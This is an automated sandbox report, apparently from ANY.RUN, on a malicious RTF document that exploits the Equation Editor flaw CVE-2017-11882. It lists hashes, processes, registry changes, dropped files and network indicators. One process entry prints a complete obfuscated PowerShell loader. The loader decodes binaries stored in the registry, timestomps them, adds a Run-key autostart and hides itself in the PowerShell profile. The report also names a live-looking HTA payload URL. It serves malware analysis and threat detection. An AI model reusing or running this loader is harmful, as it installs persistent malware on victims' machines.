File name:

08b9b5b7592004b8733544df1029e2fc085d82db1ba488a43830df49bbbc73b6

Full analysis: https://app.any.run/tasks/8ac2f05d-f075-49e0-af6c-1f30becc70b2
Verdict: Malicious activity
Analysis date: May 07, 2018, 11:25:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
opendir
exploit
cve-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

3CD725172384297732222EF9C8F74ADC

SHA1:

5F2599F92935CC378583F255A278E461C681B336

SHA256:

08B9B5B7592004B8733544DF1029E2FC085D82DB1BA488A43830DF49BBBC73B6

SSDEEP:

384:qsJ3tbrN79ozVzEFKjZ0beTmeo75Y3kNA31Dla4W3poX6:qsJ3WjZ0bA3ZsS1ha/2q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cmdl32.exe (PID: 2248)
      • cliconfig32.exe (PID: 2764)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3312)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 2876)
    • Application loaded dropped or rewritten executable

      • cmdl32.exe (PID: 2248)
      • cliconfig32.exe (PID: 2764)
  • SUSPICIOUS

    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 3312)
    • Creates files in the program directory

      • cliconfig32.exe (PID: 2764)
      • powershell.exe (PID: 2876)
    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 3312)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2796)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2796)
    • Dropped object may contain URL's

      • powershell.exe (PID: 2876)
    • Loads the .NET runtime environment

      • powershell.exe (PID: 2876)
      • powershell.exe (PID: 2316)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Windows User
LastModifiedBy: Windows User
CreateDate: 2018:04:24 08:22:00
ModifyDate: 2018:04:24 08:23:00
RevisionNumber: 1
TotalEditTime: 1 minute
Pages: 1
Words: -
Characters: -
CharactersWithSpaces: -
InternalVersionNumber: 32859
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe no specs powershell.exe no specs powershell.exe cmdl32.exe no specs cliconfig32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2248"C:\ProgramData\cmdl32\Updater\cmdl32.exe"C:\ProgramData\cmdl32\Updater\cmdl32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Auto-Download
Exit code:
1
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\programdata\cmdl32\updater\cmdl32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2316"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$ErrorActionPreference='SilentlyContinue';$Prof=$PROFILE.CurrentUserAllHosts;$Script={$c="{__XXXXXX__}";$m="{__YYYYYY__}";iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("""U2V0LUV4ZWN1dGlvblBvbGljeSAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtU2NvcGUgQ3VycmVudFVzZXIgLUZvcmNlOwokRXJyb3JBY3Rpb25QcmVmZXJlbmNlPSdTaWxlbnRseUNvbnRpbnVlJzsKCiRwbmFtZTM2ID0gIjMiICsgIjYwVHIiICsgImF5IgokYmluRGlyID0gJGVudjpQUk9HUkFNREFUQSArICJcY21kbDMyXFVwZGF0ZXJcIjsKdHJ5ewokY21kTGluZSA9IChbaW50XSRjKS50b1N0cmluZygiMDAwMDAwMDAiKSsoW2ludF0kbSkudG9TdHJpbmcoIjAwMDAwMDAwIik7CiRjbWRMaW5lID0gImNsaWNvbmZpZzMyLmV4ZSAiICskY21kTGluZTsKfQpjYXRjaHsKJGNtZExpbmUgPSAiY2xpY29uZmlnMzIuZXhlIjsKfQokbGluZSA9IG5ldy1vYmplY3QgYnl0ZVtdIDY0OwokYnVmNiA9W0J5dGVbXV0gKCwweDIzICogNjQpOwokY2J5dGVzID0gW3N5c3RlbS5UZXh0LkVuY29kaW5nXTo6QVNDSUkuR2V0Qnl0ZXMoJGNtZExpbmUpOwpbYXJyYXldOjpjb3B5KCRjYnl0ZXMsJGxpbmUsJGNieXRlcy5sZW5ndGgpOwoKJGJpblBhdGggPSAkYmluRGlyICsgImNsaWNvbmZpZzMyLmV4ZSI7CiRiaW5QYXRoZGxsID0gJGJpbkRpciArICJjbXBiazMyLmRsbCI7CiRkbXliaW5QYXRoID0gJGJpbkRpciArICJjbWRsMzIuZXhlIjsKJHJwY2RsbHBhdGggPSAkYmluRGlyICsgIkMzOUUzNDNGLmRsbCI7CiRydW4gPSAnSEtDVTpTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW5cJzsKJHN5c3RlbSA9ICdIS0NVOlNvZnR3YXJlXFVwZGF0ZXInOwokcnVuRXhpc3RzID0gRmFsc2U7CiRwbmFtZWF2ciA9ICJhdiIgKyAiZ24iICsgInQiOwokbXN2YnZtZGxscGF0aCA9ICRlbnY6V0lORElSICsgIlxzeXN0ZW0zMlxtc3Zidm02MC5kbGwiCiRjbWRsMzJwYXRoID0gJGVudjpXSU5ESVIgKyAiXHN5c3RlbTMyXGNtZGwzMi5leGUiCgokcTM2ID0gR2V0LVByb2Nlc3MgJHBuYW1lMzYgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7CmlmKCRxMzYpewoJZXhpdAp9CgpmdW5jdGlvbiBkYygkcyl7CglzYWwgbiBOZXctT2JqZWN0OwoJJGRhdGEgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJINHNJQUFBQUFBQSIgKyAkcyk7CgkkbXMgPSBuIFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07CgkkbXMuV3JpdGUoJGRhdGEsIDAsICRkYXRhLkxlbmd0aCk7CgkkbXMuU2VlaygwLDApIHwgT3V0LU51bGw7CglyZXR1cm4gKG4gU3lzdGVtLklPLlN0cmVhbVJlYWRlcihuIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5HWmlwU3RyZWFtKCRtcywgW1N5c3RlbS5JTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKSkpLlJlYWRUb0VuZCgpOwp9OwoKZnVuY3Rpb24gdXBkdCgkdCwgJGIpewoJKGxzICR0KS5MYXN0V3JpdGVUaW1lID0gIChscyAkYikuTGFzdFdyaXRlVGltZQoJKGxzICR0KS5DcmVhdGlvblRpbWUgPSAobHMgJGIpLkNyZWF0aW9uVGltZQoJKGxzICR0KS5MYXN0QWNjZXNzVGltZSA9IChscyAkYikuTGFzdEFjY2Vzc1RpbWUKfQoKZnVuY3Rpb24gd2I2NCgkcGF0aCwgJGI2NCl7CgkkYnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJUVnEiICsgJGI2NCk7CglOZXctSXRlbSAtSXRlbVR5cGUgRGlyZWN0b3J5IC1Gb3JjZSAtUGF0aCAkYmluRGlyIHwgT3V0LU51bGw7CglbaW8uZmlsZV06OldyaXRlQWxsQnl0ZXMoJHBhdGgsJGJ5dGVzKSB8IE91dC1OdWxsOwoJdXBkdCAtdCAkcGF0aCAtYiAkY21kbDMycGF0aAp9CgpmdW5jdGlvbiBzYigkaCwgJG4gKSB7CiAgICAkbGVuID0gJG4ubGVuZ3RoOwogICAgJGxpbWl0ID0gJGgubGVuZ3RoIC0gJGxlbjsKICAgIEZvciggJGkgPSAwOyAgJGkgLWxlICRsaW1pdDsgICRpKysgKSB7CiAgICAgICAgJGsgPSAwOwogICAgICAgIEZvciggOyAgJGsgLWx0ICRsZW47ICAkaysrICkgewogICAgICAgICAgICBpZiggJG5bJGtdIC1uZSAkaFskaSska10gKSB7YnJlYWt9OwogICAgICAgIH0KICAgICAgICBpZiggJGsgLWVxICRsZW4gKXtyZXR1cm4gJGl9OwogICAgfQogICAgcmV0dXJuIC0xOwp9CgppZigoVGVzdC1QYXRoICRlbnY6V0lORElSXFN5c1dPVzY0KSl7CgkkbXN2YnZtZGxscGF0aCA9ICRlbnY6V0lORElSICsgIlxTeXNXT1c2NFxtc3Zidm02MC5kbGwiCgkkY21kbDMycGF0aCA9ICRlbnY6V0lORElSICsgIlxTeXNXT1c2NFxjbWRsMzIuZXhlIgp9Cgp0cnl7CglpZighKFRlc3QtUGF0aCAkYmluUGF0aCkpewoKCQkkYjY0ID0gZGMgLXMgKChHZXQtSXRlbVByb3BlcnR5IC1QYXRoICRzeXN0ZW0pLnBhcnQxKTsKCQkkYnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJUVnEiICsgJGI2NCk7DQoJCSRybiA9IFtTeXN0ZW0uQml0Q29udmVydGVyXTo6R2V0Qnl0ZXMoKEdldC1SYW5kb20gLU1heGltdW0gOTk5OSAtTWluaW11bSAxMTExKSlbMC4uMV07DQoJCVthcnJheV06OmNvcHkoJHJuLDAsJGJ5dGVzLCRieXRlcy5sZW5ndGggLSAyLDIpOw0KCQlOZXctSXRlbSAtSXRlbVR5cGUgRGlyZWN0b3J5IC1Gb3JjZSAtUGF0aCAkYmluRGlyIHwgT3V0LU51bGw7DQoJCVtpby5maWxlXTo6V3JpdGVBbGxCeXRlcygkYmluUGF0aCwkYnl0ZXMpIHwgT3V0LU51bGw7DQoJCXVwZHQgLXQgJGJpblBhdGggLWIgJGNtZGwzMnBhdGgKCgkJJGI2NGRsbCA9IGRjIC1zICgoR2V0LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAkc3lzdGVtKS5wYXJ0Mik7CiAgICAgICAgJGJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygiVFZxIiArICRiNjRkbGwpOwoJCVthcnJheV06OmNvcHkoJGxpbmUsMCwkYnl0ZXMsKHNiIC1oICRieXRlcyAtbiAkYnVmNiksNjQpOwoJCU5ldy1JdGVtIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlIC1QYXRoICRiaW5EaXIgfCBPdXQtTnVsbDsKCQlbaW8uZmlsZV06OldyaXRlQWxsQnl0ZXMoJGJpblBhdGhkbGwsJGJ5dGVzKSB8IE91dC1OdWxsOwoJCXVwZHQgLXQgJGJpblBhdGhkbGwgLWIgJGNtZGwzMnBhdGgKCX0KCglSZW1vdmUtSXRlbSAtUGF0aCAkc3lzdGVtIHwgT3V0LU51bGw7CglSZW1vdmUtSXRlbSAkUFJPRklMRS5DdXJyZW50VXNlckFsbEhvc3RzIHwgT3V0LU51bGw7CglOZXctSXRlbVByb3BlcnR5IC1QYXRoICRydW4gLU5hbWUgIldpbnNvdW5kIiAtUHJvcGVydHlUeXBlIFN0cmluZyAtVmFsdWUgJGRteWJpblBhdGggfCBPdXQtTnVsbDsKCQoJQ29weS1JdGVtICAkbXN2YnZtZGxscGF0aCAkcnBjZGxscGF0aAoJdXBkdCAtdCAkcnBjZGxscGF0aCAtYiAkbXN2YnZtZGxscGF0aAoKCUNvcHktSXRlbSAkY21kbDMycGF0aCAkZG15YmluUGF0aAoJdXBkdCAtdCAkZG15YmluUGF0aCAtYiAkY21kbDMycGF0aAoKCSRhdnIgPSBHZXQtUHJvY2VzcyAkcG5hbWVhdnIgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUKCWlmICghJGF2cikgewoJCSYoJGRteWJpblBhdGgpIHwgT3V0LU51bGw7Cgl9CglFeGl0Cn0KY2F0Y2ggewoJJF8uRXhjZXB0aW9uLk1lc3NhZ2UgfCBPdXQtTnVsbDsKfQ=="""))) };iex $Payload|Out-Null;mkdir (Split-Path -Parent $Prof);(gc $Prof) + (' ' * 600 + $Script)|Out-File $Prof -Fo|Out-Null"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.10586.117 (th2_release.160212-2359)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2764cliconfig32.exeC:\ProgramData\cmdl32\Updater\cliconfig32.execmdl32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Access Protection Client UI
Exit code:
0
Version:
6.3.9600.16384 (winblue_rtm.130821-1623)
Modules
Images
c:\programdata\cmdl32\updater\cliconfig32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\programdata\cmdl32\updater\c39e343f.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
2796"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\08b9b5b7592004b8733544df1029e2fc085d82db1ba488a43830df49bbbc73b6.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2876"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy BypassC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.10586.117 (th2_release.160212-2359)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3312"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
Total events
1 147
Read events
817
Write events
323
Delete events
7

Modification events

(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:,&:
Value:
2C263A00EC0A0000010000000000000000000000
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2796) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1286012971
(PID) Process:(2796) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1286013094
(PID) Process:(2796) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1286013095
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:FontInfoCacheW
Value:
6000000060000000F5FFFFFF000000000000000000000000BC02000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B000000020000000200000000000000060000001A000000BC0200000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C0290000000000000001000000000028200700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D0000000B0000000200000002000000000000000500000017000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282006000000F7FFFFFF0000000000000000000000009001000000000000004000225400610068006F006D006100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005400610068006F006D00610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090000000200000002000000000000000400000013000000900100000000000060000000600000002000FDFF1F0020000000002700000000FF2E00E15B6000C02900000000000000010000000000282005000000
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
EC0A0000320DDA2FF6E5D30100000000
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:e':
Value:
65273A00EC0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2796) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:e':
Value:
65273A00EC0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
Executable files
4
Suspicious files
40
Text files
4
Unknown types
3

Dropped files

PID
Process
Filename
Type
2796WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR962C.tmp.cvr
MD5:
SHA256:
2316powershell.exeC:\Users\admin\AppData\Local\Temp\4trdnvhz.liq.ps1
MD5:
SHA256:
2316powershell.exeC:\Users\admin\AppData\Local\Temp\ekxcxsgz.udw.psm1
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Temp\uld32x0r.cpo.ps1
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Temp\lduitp1y.i2v.psm1
MD5:
SHA256:
3312EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JZR4RKAB\fin[1].htahtml
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f224c335-ef3b-41e3-bf77-44cd6662ce8bbinary
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_64b96c71-84dc-43eb-8f48-6d2582625ae4binary
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33e6de1c-f14a-4533-8df8-0f20200be381binary
MD5:
SHA256:
2876powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f6c41935-4371-4a36-bb0c-a846187e361ebinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
185.198.57.99:80
http://fb-dn.net/disrt/fin.hta
NL
html
384 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.198.57.99:80
fb-dn.net
Host Sailor Ltd.
NL
suspicious

DNS requests

Domain
IP
Reputation
fb-dn.net
  • 185.198.57.99
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
Attempted User Privilege Gain
ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199
No debug info